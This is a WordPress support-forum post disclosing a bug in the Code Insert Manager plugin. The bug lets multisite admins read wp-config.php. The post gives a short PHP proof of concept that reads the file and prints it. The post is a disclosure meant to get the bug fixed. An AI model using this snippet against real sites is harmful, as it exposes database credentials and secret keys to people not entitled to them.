Support » Plugin: Code Insert Manager (Q2W3 Inc Manager) » [Plugin: Code Insert Manager (Q2W3 Inc Manager)] Deadly SECURITY bug: wp-config exposed via php inse

  • Any admin in a WP multi site installation (even without superadmin privileges or without FTP access) can read/write wp-config.php.

    He just needs to add a new insert with the following code:

    <?php
    $GetContent = file_get_contents($_SERVER['DOCUMENT_ROOT'].'/wp-config.php');
    echo '<pre>'.htmlentities($GetContent).'</pre>';
    ?>

    (Proof of concept)

    Please try to fix it.

    http://wordpress.org/extend/plugins/q2w3-inc-manager/

Viewing 5 replies - 1 through 5 (of 5 total)
Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘[Plugin: Code Insert Manager (Q2W3 Inc Manager)] Deadly SECURITY bug: wp-config exposed via php inse’ is closed to new replies.